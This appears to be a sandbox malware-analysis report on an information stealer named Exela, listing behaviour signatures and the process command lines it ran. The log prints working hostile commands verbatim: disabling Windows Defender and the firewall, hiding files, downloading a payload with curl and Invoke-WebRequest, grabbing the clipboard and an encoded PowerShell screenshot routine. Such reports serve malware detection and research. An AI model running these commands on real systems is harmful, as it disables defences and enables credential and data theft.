| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Exela.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\no defender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Exela.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | api.gofile.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | api.gofile.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ARP.EXE | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
System Network Connections Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\Exela.exe
"C:\Users\Admin\AppData\Local\Temp\Exela.exe"
C:\Users\Admin\AppData\Local\Temp\no defender.exe
"C:\Users\Admin\AppData\Local\Temp\no defender.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A066.tmp\A067.tmp\A068.bat "C:\Users\Admin\AppData\Local\Temp\no defender.exe""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$hwnd = Get-Process -id $pid | select -Expand MainWindowHandle; $win32 = Add-Type @'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); } '@ -PassThru; $win32::ShowWindow($hwnd, 0)"
C:\Users\Admin\AppData\Local\Temp\Exela.exe
"C:\Users\Admin\AppData\Local\Temp\Exela.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "gdb --version"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get Manufacturer
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Stop-Service -Name 'WinDefend' -Force"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_ComputerSystem get Manufacturer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-Service -Name 'WinDefend' -StartupType Disabled"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled False"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\cmd.exe
cmd.exe /c chcp
C:\Windows\system32\cmd.exe
cmd.exe /c chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\curl.exe
curl -L --silent "بتحط هنا رابط باتشك" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
